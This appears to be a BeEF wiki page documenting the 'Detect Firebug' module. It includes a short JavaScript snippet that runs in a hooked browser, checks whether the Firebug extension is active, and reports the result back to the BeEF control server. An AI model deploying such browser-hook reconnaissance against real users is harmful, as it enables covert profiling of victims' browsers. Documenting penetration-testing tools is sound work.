-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Detect Firebug
Jess Williams edited this page Jan 2, 2020
·
5 revisions
- Objective: This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window.
- Date: February 2012
- Author: bcoles
- Browser: Firefox
- code
This module test if window.console.firebug or window.console.exception objects exists to detect enabled firefbug module:
beef.execute(function() {
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK